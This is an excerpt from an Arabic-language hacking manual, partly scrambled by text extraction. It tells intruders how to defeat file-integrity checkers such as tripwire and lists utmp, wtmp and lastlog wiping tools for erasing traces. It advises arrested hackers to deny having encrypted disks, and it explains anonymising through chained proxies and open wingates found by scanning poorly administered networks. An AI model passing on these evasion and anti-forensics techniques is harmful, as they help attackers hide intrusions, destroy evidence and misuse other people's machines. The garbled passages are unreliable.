مفات هذه البرامج للتأكد من أنها لن تقوم بالبلغ عن القتحام‪ .‬وتدار هذة البرامج‬ ‫بواسطه أداه تسمى ‪ cron‬و يكون مكانها الفتراضي أو الطبيعي هو ‪ /var/spool/cron/crontabs‬و‬ ‫هي تقوم بمتابعه جميع المدخلت ‪ . hobgoblin.

‬‬ ‫لذا فعليك عدم القيام باي اتصالت فيها اخبار اخترقاتك ‪ ..‬و ال ستواجه مشاكل اعتقد انك‬ ‫‪85‬‬ .1‬ايهام تلك البرنامج بطرق شرعي بانه تم تغيير ملف ما بشكل قانوني ويتم تحديث قواعد البيانات‬ ‫مثل "‪..pl‬‬ ‫‪l5 : compile directory : l5‬‬ ‫كما تري هناك احتمالت كثيرة‪ ،‬ربما البرنامج نفسه او قواعد البيانات يوجد علي جزء آخر‪ ،‬مثل جزء‬ ‫‪ NTFS‬لمضيف او جهاز آخر ‪ ،‬او حتي قواعد بيانات التي تحمل معلومات ‪ checksum‬في جهاز محمي‬ ‫علي الكتابة ) اقراص ‪ CD‬مثل ( ‪.login.‬‬ ‫اذا كان يمكنهم مراقبة كل هذه التصالت اكيد ببساطه يمكنهم مراقبة خط تيليفونك ‪. . tripwire‬‬ ‫‪binaudit : /usr/local/adm/audit : auditscan‬‬ ‫‪hobgoblin : ~user/bin : hobgoblin‬‬ ‫‪raudit : ~user/bin : raudit.‬‬ ‫ولكن يمكنك القيام بعملية فحص استطلعي سريع لمعرفة البرامج المستخدمة ‪ ،‬واذا لم تستخدم ففرصتك‪،‬‬ ‫واذا لم تجد شي ولكنك كنت متاكدا من استخدامهم لتلك النواع من البرامج هذا يعني ان الموقع او المزود‬ ‫محمي بشكل جيدا ) هارد لك ( ويجب ان ل تعبث بالملفات ابدا ‪.‬‬ ‫لتؤمن نفسك عليك ان تبقى على هذا الحال على القل من شهر الى شهرين ‪ .logout ."tripwire -update /bin/target‬‬ ‫‪ ....‬و‬ ‫تمنعهم من راسال اي رسائل غيير عاديه ‪...‫‪SOFTWARE : STANDARD PATH : BINARY FILENAMES‬‬ ‫‪tripwire : /usr/adm/tcheck... .‬و ان حتى اردت ان تحذر اصحابك فل تخبرهم‬ ‫هاتفيا او ببريد الكتروني ) ال اذا كان مشفرا( و من الفضل ان تخبرهم عندما تقابلهم وجها لوجه ‪ .2‬يمكنك تغيير قائمة الملفات التي يجب فحصها وتزيل اسم الملفات المراد من القائمة فل يتم فحصها مرة‬ ‫اخري للتحقق ) ولكن يجب ان تتاكد ايضا ان ملف قواعد البيانات نفسها ل يتم فحصها ب ‪checksum‬‬ ‫حتي ل يتم اكتشاف التغييرات التي قمت بها (‬ ‫ حيل المستخدم المنيه‬‫*******************‬ ‫هذه الحيل ما ندر توجد او تستخدم لكنني كتبتها فقط لكون شملت كل شئ ) لكمال الموضوع ( ‪ .‬‬ ‫ولكن ماالعمل اذا اكتشفت انهم يستخدمون تلك البرامج وبامكانك تغييرها؟؟‬ ‫يمكنك ‪ .‬‬ ‫ليعني القانون اي شئ لل ‪ ) admins‬بعض الوقات اعتقد انه ل يوجد فرق بين ال ‪ hacker‬و ال‬ ‫‪ administrator‬ال بان مالك الكومبيوتر هو ال ‪ administrator‬فقط ( عندما يعتقدون انك هاكر فانك‬ ‫فورا اصبحت مذنب ‪ . /usr/local/adm/tcheck : databases...‬فبعض‬ ‫المستخدمين يسمون اشتراكاتهم ‪ admins‬و بالطبع ل يريدون ان يعبث في ملفاتهم اي شخص فيقومون‬ ‫بعمل بعض الحيل في ملفات ال ‪ startup‬لذا فدائما تحقق من ‪profile.‬‬ ‫الخ ) اي الملفات التي تبدا بنقطه (‬ ‫الجزء الخامس ‪:‬‬ ‫=========‬ ‫ماذا تفعل ان وضعت تحت المراقبه؟‬ ‫***************************‬ ‫متى اصحبت تحت الميكروسكوب ) المراقبه ( من قبل الشرطه او حتى ال ‪ administrators‬عليك القيام‬ ‫بخطوات هامه و سريعه حتى ليستطيعو المساك بدليل ) برهان ( عليك‬ ‫ ملحوظه ‪ :‬ان كان في اعتقاد ال ‪ administrators‬انك ‪ hacker‬فانت ==< مذنب حتى تثبت‬‫براته ‪.cshrc. ...‬سيقومو مباشرة بمراقبة بريدك اللكتروني و ملفاتك و ان كان محترف الدمين‬ ‫سيرصدك ايضا هجماتك الخرى ‪.

e.Changes fields of the logfile to anything you want‬‬ ‫‪Delete .Don't use! Can be detected‬‬ ‫‪-------------------------------------------------------------------------------------‬‬‫الجزء الثامن ‪:‬‬ ‫=========‬ ‫كلمه ختاميه‬ ‫**********‬ ‫‪86‬‬ .just Overwrites the entries with zero-value bytes‬‬ ‫‪!Don't use such software (f..c Deletes entries in wtmp‬‬ ‫‪wtmped..c‬‬ ‫‪!marryv11.Overwrite ..‬و ان كان يجب استجوابك فاطلب‬ ‫ان يتم هذا فقط من خلل محاميك ) و هذا ايضا حق من حقوقك (‬ ‫لتخبر ابدا عن اصدقاؤك ليس ققط كنوع من الشهامه ‪ .‬لن هذا لن يفيدك بل سيدينك اكثر ‪ ..c Changes the entries in utmp.‬لذا فانه من العملي جدا ان يكون عندك محامي‬ ‫جاهز في اي وقت قبل ان تقع الفاس في الراس و بعدها تبدا في البحث و التدوير‬ ‫ثانيا ‪ :‬ابدا ل تتكلم ال الشرطه !!! ‪ :‬لتعطي للشرطه اي معلومات عنك او عن زملئك بحجة ان هذا سيخفف‬ ‫العقاب عنك و سيخرجك من المازق ‪ . zap) .Deletes.it can be detected‬‬ ‫‪--------------------------------------------------------------‬‬‫‪LOG MODIFIER‬‬ ‫‪++++++++++‬‬ ‫‪ah-1_0b. cuts out the entries you want‬‬ ‫‪Edit .c Overwrites utmp.‬فاطلب محاميك كي‬ ‫يدافع عنك هو و يطلعك على ما يجب ان تذكره و ما يجب ان ل تذكره نهائيا ‪ . wtmp.c Deletes entries in utmp. wtmp and lastlog‬‬ ‫‪invisible...c Edit utmp. wtmp.c Deletes entries in wtmp‬‬ ‫‪!zap. Watch out.‫لترغب بها‬ ‫الجزء السادس ‪:‬‬ ‫=========‬ ‫ما الذي عليك القيام به و ايضا الذي لبد من عدم القيام به في حالة انه تم القبض عليك‪:‬‬ ‫**************************************************‬ ‫**************‬ ‫اول ‪ :‬اطلب محاميك فورا !!!! ‪ :‬ل تحاول بان تتذكى انت و ترد على التحقيق بمفردك ‪ .best‬‬ ‫‪wzap.real Editor for the logfile‬‬ ‫‪. so‬‬ ‫‪! it's better than zap.‬بعدها غالبا ما سيطلب‬ ‫المحامي جهازك ) الكومبيوتر ( باقصى سرعه بحجة احتياجه في العمل و ال عليهم تحميل جميع العباء‬ ‫الماديه و المشاكل التي قد تحدث عن عدك استخدام الجهاز ‪ . there are numerous inv*.c Overwrites utmp. lastlog and wtmpx‬‬ ‫‪cloak2.‬انما ايضا بدخول اصحابك في الموضوع ستتسع‬ ‫دائرة الموضوع و من ثم تزيد المعلومات عنك و عن جرائمك و هم ايضا !‬ ‫بعض الدول من ضمن قانونها انه اذا لم تستطع الشرطه فك تشفير ملفاتك او جزء من الهارد ديسك فيمكنك‬ ‫بمنتهى الحريه عدم الفصاح عنها‬ ‫لكن بعض الدول الخرى في قانونها انه مادامت وقعت في المصيده لبد ان تدلي لهم بكل شئ في هذه الحاله‬ ‫انصحك باستشارة محاميك و انكار انك لديك اي اقراص صلبه مشفره‬ ‫الجزء السابع ‪:‬‬ ‫========‬ ‫قائمه بافضل البرامج للتخفي و الختباء ‪:‬‬ ‫******************************‬ ‫‪Change .tar Changes the entries of accounting information‬‬ ‫‪clear. wtmp. wtmp and lastlog with predefines values. lastlog and accounting data . lastlog .

‬دائما اجعل عيناك مفتوحان ‪ .Sock Host .‬اعرف في من تثق و من ل !!‬ ‫لتفكر في نفسك فقط )انما ايضا تذكر كل من حولك (‬ ‫تمنياتي للجميع بحياة ممتعه و امنه ‪...‬‬ ‫انتهى‪،،،‬‬ ‫" كيف تبقى مجهول الهوية في النت )الجزء الول(؟؟ "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫في هذا الموضوع سوف أقوم بتعليمكم‬ ‫ماهو؟‬ ‫‪Proxy .‫لتدعهم ابدا يقبضون عليك ‪ .Wingate‬‬ ‫)وكيفية استخدامهم للزيادة من صعوبة الكشف عن هويتك في النت(‪-‬‬‫مع أدوات بسيطة أيضا تساعدك في التخفي‬ ‫‪87‬‬ ..

..tk‬‬ ‫إلى الخادم ‪ server‬الموقع ومن ثم تحميلها وتخزينها في حسابها بعد ذلك سوف تمدك وتعطيك الصفحة‬ ‫أي‪:‬تستعرضها‪.‬‬ ‫أليست هذه العملية تأخذ ‪ bit‬بسيط في وقت أطول مقارنة بالتصال المباشر )العادي( الذي يكلفك فقط بطلب‬ ‫الصفحة من خادم الموقع ومن ثم جاري تحميلها بسهولة واستعراضها‬ ‫لكن مع استعمالك للبروكسي سيرفر سوف يصبح اتصالك بالنترنت بطيء مقارنة مع التصال المباشر وذلك‬ ‫لن كل صفحة تقوم بتحميلها أي تستعرضها تذهب إلى خادم البروكسي أي ‪ proxey server‬وهذا يثقل‬ ‫عملية التصفح‬ ‫وهناك حالة وحدة وقد تصبح ‪ lucky‬بعض الحيان قل كيف‬ ‫إذا الشخص قام باستخدام نفس البروكسي واستعرض نفس الصفحات وانت استخدمت البروكسي الي‬ ‫استخدمه هذا الشخص واستعرضت الصفحة الي استعرضها راح يصبح البروكسي سريع ليه؟!‬ ‫لن الشخص الول الي قام باستخدام البروكسي وعرض الصفحات الصفحة حملت إلى ‪ proxy server‬فما‬ ‫بالك إذا كان لديك نفس البروكسي وحبيت تسعرض نفس الصفحة سوف يكون سريع لن الصفحة‬ ‫‪ download‬جاهزة فهمت ‪#..‫‪++++++++++++++++++++++++++++++++++‬‬ ‫‪Introduction to Proxy Server‬‬ ‫=)الدخول إلى ‪ proxy server‬أي‪:‬خادم الوكيل(=‬ ‫‪) proxy server‬خادم الوكيل( هو خادم ‪ server‬ليقوم أحدا ما بتنزيله على نظامه للتصال مع المواقع‬ ‫أو أي جهاز على النترنت مايفعله أول هو التصال بخادم الوكيل ‪proxy server‬‬ ‫لكنه غير إجباري لكن غالبا مايستخدم في الشبكات‬ ‫مثل‪LAN:‬‬ ‫‪Local Area Network‬‬ ‫شبكة إنترنت محلية عند اتصالك بالنترنت خلل ‪ proxy server‬جميع اتصالتك سوف تذهب إلى هذا‬ ‫البروكسي المستخدم أول وقبل كل شيء ثم تتوزع على الجهزة التي تريد أن تعمل إتصال بها كمثال‬ ‫إذا أردت أن تتصل بالنترنت من خلل استخدام ‪ proxy server‬وتريد أن تتصفح وتفتح موقعا كهذا‬ ‫‪/http://hackergurus.tk‬‬ ‫عليك أول بالطلب من هذا ‪ proxy server‬ثم يقوم ‪ proxy server‬بطلب الصفحة‬ ‫‪/http://hackergurus.‬‬ ‫وأيضا ياأخواني الوقت مهم مثل اذا الواحد استعرض صفحة ببروكسي من قبل ‪ 10‬أيام وانت استخدمت نفس‬ ‫البروكسي واسعرضت نفس الصفحة غير اذا عرضها في يومين لن ‪ proxy server‬يقدم المواقع الحديثة‬ ‫على القديمة علشان كذا أحيانا تلحظ تأخر في البروكسيات كل ماعليك عمل ‪ Refresh‬أو ‪Reload‬‬ ‫‪Why use a Proxy Server‬‬ ‫=)لماذا نستمعل البروكسي سيرفر؟(=‬ ‫وانا راح اجاوب على الخوان الي يسئلوني مادام خادم البروكسي يقوم بعملية إبطاء التحميل والتقليل من‬ ‫السرعة إذا مالدافع لستخدامه ؟!!!‬ ‫الجواب‪:‬هو أن مزودين خدمة النترنت‬ ‫‪ISP‬‬ ‫‪Internet Service Provider‬‬ ‫يقومون بالتحديد وبوضعك في قفص وهو عدم السماح لستعراض وتحميل الصفحات إل التي تم الموافقة‬ ‫عليها من قبل مزود الخدمة ويقومون بتقليل المواقع للحفاظ على ‪ Traffic‬الخاص بهم لتوفير السرعة في‬ ‫استخدام البروكسي لمشتركينهم‬ ‫أما ‪ proxy server‬سوف يجعل لك الحرية الكاملة في استعراض أي موقع مهما كان وسبب آخر‬ ‫للبروكسي وهو للحفاظ أو للزيادة من بقائك مجهول أثناء قيامك بأي عملية من عمليات التصال يعني لو‬ ‫استخدمت بروكسي راح يصعب على خادم الموقع اصطيادك وذلك لنه يأخذ ‪ ip‬الذي اتصل الموقع من خلله‬ ‫وهو ‪ ip‬البروكسي وهو الذي يتصل مع خادم الموقع‬ ‫وأيضا تستطيع الزيادة من صعوبة محاولة السقاط بك وذلك باستخدام عدة بروكسيات ذات منافذ مختلفة لكن‬ ‫أعلم أن هذا سوف يقوم بتقليل من سرعة التصال لذلك حاول ان تستخدم‬ ‫‪ proxy‬و ‪ port‬قريبين إلى منطقتك التي تعيش فيها حتى يكون ‪ proxy server‬قريب وبذلك سوف‬ ‫‪88‬‬ .

google.‬‬ ‫تحذير للجميع إياكم ياأخوان أن تنخدعوا ببروكسيات مايكروسوفت مهما وضع لها من إعلن كأن يقول‬ ‫استخدم‬ ‫‪ cach.‬بإمكانك تاخذ عنوان ‪ wingate‬من أصدقائك إذا‬ ‫كان أحد عنده ‪ .‬الشيء الثاني أقترح عليك تستخدم برامج‬ ‫‪WinGate Scanner‬‬ ‫هنالك العديد منها بالنت ابحث فقط في ‪google‬‬ ‫‪/http://www. satellite connection. ISDN..com‬‬ ‫‪89‬‬ . Telnet‬‬ ‫‪ the wingate‬سوف يجعل أي شخص على الشبكة دخول النترنت أو التصال به لمواقع أخرى ‪ .‬بدل من تحديد‬ ‫المدخل للناس من ‪) Local Network‬الشبكة المحلية(‬ ‫وفتح الطريق لي شيئ من ‪ ipspoof‬في ‪ ICQ .‫تزداد السرعة وأحيانا تفوق سرعة البروكسي سرعة بروكسي الخاص بمزود الخدمة مارأيك!! ‪(.microsoft.Mirc‬إلى سوء استغلل الحجم ‪.‬‬ ‫مثل ‪ wingate‬قد يطلق عليه ‪ open wingates‬وعادة تنتهي مدتها في بضعة أيام أو شهور حتى يقوم‬ ‫باكتشافه ‪) Admin‬المدير( وهذا راح يكون ‪ DIScover‬ياأخواني يعني مكشوف أو يتلقى شكاوي من‬ ‫سوء استخدام أو أعضاء غامضين !!!‬ ‫الفائدة الوحيدة للمديرين هي القدرة على وضع مستخدمين متعددين في نفس التصال لكن ياأخوان المشاكل‬ ‫تفوق الفوائد‬ ‫إذا أي شخص قام بتنزيل ‪ WinGate‬خاص به عليه الحذر بشدة ومعرفة ماهو يفعل ويتأكد من أنه موفق‬ ‫بشكل آمن وهنالك أخرى متعددة أكثر ‪ WinGate‬أمانا مثل برامج ‪SyGate‬‬ ‫في معظم الحالت ملفات ‪) Logs‬سجلت( الخاصة بالـ ‪ WinGate Server‬تحذف عادة بعد ‪ 48‬ساعة‬ ‫للعمال وأيضا للـ ‪) ISP's‬خاصة بالكبار(‬ ‫أي ليوجد حاجة أو موارد لتدوين كل شيء يصادف خادم ‪wingate‬‬ ‫‪How do I find Wingates‬‬ ‫=)كيف يمكنني الحصول على ‪WinGate‬؟(=‬ ‫أفضل طريقة للحصول على هذا الشيء هو كلمة بالفم ‪ . cable modem.com‬بمنفذ ‪80‬‬ ‫وطبعا انت ماتصدق تلقي بروكسي بهذي المميزات‬ ‫‪ -1‬سريع التصفح‬ ‫‪ -2‬يفتح جميع المواقع‬ ‫‪ -3‬التحميل عالي جدا وقوي‬ ‫هل تعرف لماذا ؟‬ ‫لن أكثر المستخدمين حول العالم هذا البروكسي سيرفر وهذا خطير جدا‬ ‫لن هذا البروكسي سيرفر سوف يقوم بمعرفة جميع تحركاتك وحفظها في ملفات ‪Logs‬‬ ‫‪Introduction to Wingate‬‬ ‫=)الدخول أو الدخال إلى ‪=(Wingate‬‬ ‫كثيرا مانسمع عنه لكن هل نعرف معناه الحقيقي ؟‬ ‫ماهو ‪ WinGate‬؟‬ ‫هو ‪ proxy server firewall‬أي يفوق البروكسي وهو خادم بروكسي ذو حاجز ناري يحتوي على‬ ‫حزمة كبيرة وضخمة من البرامج المختصة بالحماية والتي تبقيك ‪) Anonymously‬مجهول الهوية(‬ ‫التي تقوم بالسماح بالمشاركة بفرد واحد أو بعدة من اتصالت النترنت بشركة كمبيوتر بالكامل‬ ‫اتصال النترنت يكون مشارك بواسطة ‪ WinGate‬تقريبا لعدة أنواع تشمل‪:‬‬ ‫‪------------------------------------------------------------------------------------------‬‬‫‪dial up modem.‬بصورة‬ ‫سيئة وفق بين ‪ wingate‬وعدم كفاءة ‪) Aminstrator‬المدير(‬ ‫وهنالك العديد من ‪ wingate‬والذي تجعل الشخاص على النترنت للتصال ببعضهم ‪ . 23‬في الحقيقة‬ ‫هو اتصال ‪. or even‬‬ ‫‪dedicated T1 circuits‬‬ ‫‪------------------------------------------------------------------------------------------‬‬‫‪wingate‬‬ ‫متشابه مع البروكسي سيرفر حيث يعمل اتصالت مع كومبيوتر لسيرفر آخر خلل المنفذ ‪ . xDSL.

.‬‬ ‫خلل ‪ Unix‬أفضل طريقة هي‪ :‬المحاولة والخطأ‬ ‫‪Trial and Error‬‬ ‫اتصل بالتلنت في ‪ wingate‬من المنفذ ‪23‬‬ ‫واذا لقيت اترك فراغ السم والباسوورد واذا دخلت راح تحصل واحد أيضا بإمكانك تجربة اسمك وكلمة سرك‬ ‫او تستخدم ميزة ‪) Guest‬الضيف( أو ‪Anonymously‬‬ ‫‪Introduction to Socks Host‬‬ ‫=)الدخول أو الدخال إلى ‪=(Socks Host‬‬ ‫‪ Socks Host‬تقريبا مثل ‪ WinGate‬لكن الختلف وهو ان السوكس يتصل من خلل المنفذ ‪1080‬‬ ‫وبإمكانك عمل العدادات عليها وهي تتوفر في المتصفح‬ ‫‪explorer and netscape‬‬ ‫وبإمكانك إضافة ‪Socks Host‬‬ ‫وهذه الطريقة تستخدم كثيرا في ‪ Mirc‬وتقوم بحمايتك وبإخفاء ‪ ip‬الخاص بك وتعمل كـ ‪FireWall‬‬ ‫**********************‬ ‫وهذه برامج مساعدة على بقائك مجهول الهوية‬ ‫**********************‬ ‫‪Ghost Surf‬‬ ‫‪$$$$$$$$$$$$$$$$$$$$$$‬‬ ‫‪Stealther‬‬ ‫‪------------------------------------------‬‬‫ابحثوا عن البرنامجين السابقين في النترنت‬ ‫‪-------------------------------------------‬‬‫لكن أعلم ياأخي الكريم أن وبكل مافعلت لن تصبح مجهول ‪%100‬‬ ‫انتهى‪،،،‬‬ ‫" كيف تبقى مجهول الهوية في النت)الجزء الثاني(؟؟ "‬ ‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪ :‬ةةةةةة<‬ ‫ألحين الموضوع هذا سوف يكون فيه تطبيق عملي وليس كالسابق‪.‫كل ماعليك فعله هو وضع مدى ‪ ip‬او ‪ hostname‬ومن ثم البدء بالبحث‬ ‫مثل اقترح عليك البحث في بلد العالم الثالث أو الشرق الوسط وأفريقيا وأخيرا شبكة ‪ @home‬كلهم‬ ‫يتشابهون ولديهم صفات شائعة وهي‪:‬‬ ‫توفر ‪ wingates‬والذي وفق بصورة رديئة وعادة هناك ‪ wingate‬مفتوح قليل على ‪NetWork‬‬ ‫حقهم ‪..‬‬ ‫هذه الفقرات عن ‪ Chaining Proxies‬لبقاء حريتك وسريتك على النترنت وقت أطول أثناء اتصالك لكن‬ ‫لتظن ان هذا الموضوع كافي فكلما قرأت عن هذا الجانب سوف تصبح الشخص المجهول‬ ‫‪90‬‬ ...

rosinstrument.com/proxy‬‬ ‫أو هنالك طريقة أفضل لكم وأنصحكم إنكم تسجلون بـ ‪ Group‬وهو يقوم بإرسال بروكسيات جديدة جدا‬ ‫وبمنافذ مختلفة‬ ‫الجروب‪P_R_O_X_Y@yahoogroups.org/anon_list.multiproxy.htm‬‬ ‫‪/http://tools.‬‬ ‫قبل أن تقرأ هذا الموضوع علي اول ان اقوم بإرشادك كيف تحصل على ‪ Proxy‬مع تحديثها من هذه‬ ‫المواقع‪:‬‬ ‫‪http://www.com:‬‬ ‫طريقة التسجيل‬ ‫قم بالدخول إلى حسابك وأرسل للجروب بهذه الطريقة‬ ‫في خانة الرسال إلى اكتب‬ ‫‪P_R_O_X_Y-subscriber@yahoogroups...‬‬ ‫=========================‬ ‫*************************************‬ ‫&&&&&&&&&&&&&&‬ ‫‪proxy server‬‬ ‫&&&&&&&&&&&&&&‬ ‫هو خادم ‪ Proxy‬يقوم بالتصال بين ‪(WebSite..etc):‬‬ ‫هذه البروكسيات تقوم بإرسال طلبات لكي يستقل او يستعرض المستخدم موقعا على النترنت البروكسي‬ ‫يرسل طلبك على النترنت لكي يطلب هذا الموقع وبعد ذلك سوف تدخل الموقع ببروكسي وهذا سوف يخزن‬ ‫في ‪Proxy Server‬‬ ‫كما قلنا في الموضوع السابق‪...net‬‬ ‫أو‬ ‫‪/http://www.IRC Chat.‫وأيضا سوف نتكلم عن ‪ Chaining wingates‬لتصبح مجهول على ‪Telnet‬‬ ‫‪)------------------------------------------‬‬‫من المعروف أن أغلبكم يستخدم ‪ proxy‬لخفاء ‪ ip‬الخاص به او ‪ Domain‬او قد يستخدم البروكسي لكي‬ ‫يجتاز المواقع المغلقة وأيضا لحماية هويته ‪.‬‬ ‫هذي توضح كيف تتصل عن طريق البروكسي بالموقع‬ ‫]‪[User]>>>>>[Proxy]>>>>>[Web Pages‬‬ ‫‪---------------‬‬‫‪Proxy Chaining‬‬ ‫‪91‬‬ .com‬‬ ‫وقد تعرف هل عنوان ‪ Ip‬تغير أم ل !!! هذا بالنسبة للموقع الول أما الموقع الثاني فهو خاص لكشف‬ ‫البروكسيات واعطائك مستوياتها ‪.com‬‬ ‫وأرسل رسالة فارغة إليهم بعد ذلك سوف تتلقى رد مباشرة قم بعمل ‪Replay‬‬ ‫الن مبروك لقد سجلت بالجروب‬ ‫‪)------------------------------------------‬‬‫=========================‬ ‫أن لن أقوم بمساعدتك في كل عمل تقوم به تستطيع التأكد من أن‬ ‫البروكسي يعمل بالذهاب إلى ‪:‬‬ ‫‪/http://www.privacy.‬‬ ‫لكن عليك ان تتعلم كيف تستخدم ‪ Proxy‬ومن الفضل ان تعرف ماذا هو ‪ Ip Address‬و ‪Domain‬‬ ‫أول ‪.proxytester.

com‬‬ ‫او يمكننا وضع عناوين بروكسيات بمنافذها‬ ‫‪http://anon.com‬‬ ‫‪ = proxy‬استبدله ببروكسي رقمي يكون أفضل لك ‪.com/-_-http://www...anonymizer.com/-‬‬‫‪http://www.com‬‬ ‫حركة جميلة وجديدة )‪ (-_-‬لم ترونها مسبقا صحيح !!!‬ ‫وأيضا يمكننا استخدام ‪ Chaining‬مثل‪:‬‬ ‫_‪http://proxy.23:‬‬ ‫‪92‬‬ . or http‬‬ ‫‪ Chaining‬هي مهمة كما أقول لن تصبح مجهول ‪ %100‬لكن حاول بقدر المستطاع على ان ل تمسك‬ ‫ويطادونك مثل السمكة لكن البروكسيات المتعددة صعب ان يكشفها احدا لكن مثل حاولت تدخل على موقع بالـ‬ ‫‪ ftp‬راح يصطاد البروكسي بعد كذا لو كان معاه فلوس كان طلب من‬ ‫‪ Adminstrator‬ملفات ‪ Logs‬لكي يعرف المصدر والمصدر ايضا راح يكون ‪ proxy‬ههههههههه‬ ‫يعني على هذا المنوال إلى ان يصل الى المستخدم لذلك عملية ‪ Chaining Proxy‬عملية مفيدة جدا‬ ‫ويصعب احدهم المساك بك‬ ‫لكن ملفات ‪ Logs‬تنحذف في اوقات بعد الضغط على البروكسي لكي يصل الى الحد المسموح به من تحميل‬ ‫الملفات على البروكسي الخادم الي يحتوي على البروكسيات لذلك سوف تصبح ملفات ‪ Logs‬متجددة ‪.google.com/http://www..‬‬ ‫‪---------------‬‬‫‪HTTP Chaining‬‬ ‫‪---------------‬‬‫‪ HTTP chaining‬هي نفس طريقة ‪ Proxy‬ويمكنك عملها من مستعرضك وفي خانة ‪Address‬‬ ‫مثال‪:‬‬ ‫‪http://proxy. ftp server.com‬‬ ‫مثال آخر‬ ‫كإضافة علمة )‪ (/‬بين المواقع‬ ‫‪http://proxy1/http://proxy2:80/proxy3:80/http://www.destination.free.yahoo.server1.. Unix server.magusnet.234.server2.124.124. ftp..google.23:80‬‬ ‫العنوان‪213.com/-_-http://proxy..‬‬ ‫‪---------------‬‬‫‪Browser Chaining‬‬ ‫‪---------------‬‬‫وهو استخدام البروكسي من متصفحك وانا سوف يكون حديثي فقط عن ‪ Internet Explorer‬لنه الكثر‬ ‫استخداما ‪----‬‬ ‫ألحين مثل عندنا بروكسي‬ ‫‪213.‫‪---------------‬‬‫معناها عدة بروكسيات وهذي طريقة فعالة جدا لكي تصبح مجهول الهوية حيث يمكنك ان تتصل بأكثر من‬ ‫بروكسي لكي تعرض موقع واحد‬ ‫مثال‪/‬‬ ‫]‪[User]>>>[Proxy1]>>>[Proxy2]>>>[Proxy3]>>>[Proxy4]>>>[Destination‬‬ ‫يوضح هذا المثال ان المستخدم اول عليه التصال بالبروكسي الول فالثاني فالثالث والرابع وأخيرا الهدف‬ ‫مما يسبب بطأ في التصال‬ ‫‪Destination = web page. etc‬‬ ‫إذا ‪ Proxy chaining‬مطلب ضروري لكي يستخدمه أي هكر ليحفظ سريته اثناء الدخول إلى أي‬ ‫‪ server‬مثل ‪telnet.234.

134.67 Port: 80‬‬ ‫‪$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$‬‬ ‫&&&&&&&&&&&&&&‬ ‫‪Wingates‬‬ ‫&&&&&&&&&&&&&&‬ ‫‪ Wingate‬هو ‪ proxy server‬الذي ينزل في جهازه او جهازها ليسمح بالفرد او بعدة أفراد ليأخذون‬ ‫مقاعدهم بالمنفذ خلل ‪)) 23‬منفذ ‪ Telnet‬العادي ((‬ ‫بعض ‪ Wingates‬يسمحون لي شخص متصل ‪ online‬لكي يتصلون به مباشرة او في وقت قصير‬ ‫لتتعدى اليام لكن اعلم ان هذا ليس من القانون وهنالك خصائص للـ ‪ Admin‬تمنع من استخدام‬ ‫‪ wingate‬على جهازه هذا على حسب المدير هل يفهم في هذا المجال أم ل !!!!‬ ‫وهي عبارة عن ‪ ip‬أجهزة أو اسماء أجهزة تتصل من خللها على المنفذ ‪ 23‬بأداة ‪ Telnet‬أو يمكنك من‬ ‫عمل بحث ببرامج‬ ‫‪WinScan‬‬ ‫‪Wingate‬‬ ‫‪93‬‬ .124.23:‬المنفذ‪ 80:‬وبعد كذا اضغط موافق و‬ ‫والحين نبغى نستخدم الستعراض المتعدد ‪Chaining Proixes‬‬ ‫بدال مانحط بروكسي واحد في العنوان نحط أكثر من واحد مثل كذا‪/‬‬ ‫‪Address: 213.172.23:80 121.148.234.124.23:80 143.54.‫المنفذ‪80:‬‬ ‫ألحين كيف نحطها بدال البروكسي الخاص بالـ ‪ ISP‬أي مزد خدمة النترنت‬ ‫نروح عند‬ ‫أدوات ‪Tools‬‬ ‫خيارات إنترنت ‪Internet Options‬‬ ‫بعدين اتصالت ‪Connections‬‬ ‫تختار التصال الي تدخل في النترنت بعدين‬ ‫إعدادات ‪Settings‬‬ ‫راح تجد‬ ‫‪) Address‬العنوان(‬ ‫‪) Port‬المنفذ(‬ ‫ونضعه بداله‬ ‫العنوان‪ 213.234.

130 23‬‬ ‫لحظ وجود المسافات فمسافة زائدة او ناقصة قد تعثر خطوتك‬ ‫بعد كذا سوف تتصل بالوين جيت مثل هذا‬ ‫‪Wingate> 203.‫‪Download‬‬ ‫‪------------------------------‬‬‫‪Chaining Wingates Using Telnet‬‬ ‫‪------------------------------‬‬‫ألحين راح نستخدم عدة ‪ Wingate‬كالسابق والدوات التي نحتاجها‬ ‫هي فقط ‪ DoS‬وأداة ‪ Telnet‬لظن أن الجهزة سوف تخلو من أهم هذين الداتين إل نادرا ‪..17.133.173.7 23‬‬ ‫‪94‬‬ .207.166 23‬‬ ‫بعدين تقدر تكرر العملية اكثر من مرة ولكن مع تغيير العنوان يعني كذا‬ ‫‪Wingate> 213..45 23‬‬ ‫وأيضا اتصل مرة أخرى‬ ‫‪Wingate> 10.133.119.99.‬‬ ‫جميع ‪ wingate‬تتصل عن طريق المنفذ ‪ 23‬لكن المنفذ ليس مهما لكني سوف أضيفها لكم لكي تتعلموا‬ ‫فقط كيف يتم التصال بالـ ‪ Telnet‬عن طريق المنافذ‬ ‫وهذا عنوان جهاز امكننا إحضاره‬ ‫هو ‪ 61..119.65.130‬ومنفذه ‪23‬‬ ‫ويتم التصال به عن طريق ‪ Telnet‬مثل‪:‬‬ ‫‪C:\WINDOWS>telnet 61..212.

18..org Connecting to host arbornet.245.119.133.arbornet.‫ اتصل بالموقع‬wingate ‫ألحين بعد ماتتصل بأكثر من‬ WinGate>arbornet.173.207.org.org ‫اذا الطريقة وبخطوة سريعة تبدو كذلك‬ C:\Windows> telnet 61.166 23 Wingate>135.130 23 Wingate>203.Connected ،،،‫انتهى‬ 95 ..167 23 Wingate>m-net.

